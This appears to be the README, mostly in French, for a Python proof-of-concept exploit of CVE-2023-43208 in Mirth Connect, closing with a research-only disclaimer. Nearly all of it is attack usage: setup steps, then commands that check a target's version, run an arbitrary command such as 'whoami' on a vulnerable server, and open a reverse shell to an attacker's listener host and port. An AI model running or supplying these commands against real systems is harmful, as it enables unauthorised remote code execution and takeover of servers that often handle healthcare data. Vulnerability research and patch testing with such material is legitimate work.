
Script Python de preuve de concept démontrant CVE‑2023‑43208 dans Mirth Connect, permettant des vérifications de version et l'exécution de commandes sur des instances vulnérables.
# Create a clean virtual environment
python3 -m venv .venv
source .venv/bin/activate
# Install pinned dependencies
pip install -r requirements.txt
# Check version only
python3 CVE-2023-43208.py -u https://TARGET/ --check
# Execute a single command
python3 CVE-2023-43208.py -u https://TARGET/ -c "whoami"
# Reverse shell (start nc listener first)
python3 CVE-2023-43208.py -u https://TARGET/ -l LHOST -p LPORT
Cette preuve de concept est fournie à des fins de recherche et d'éducation uniquement. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par ce code.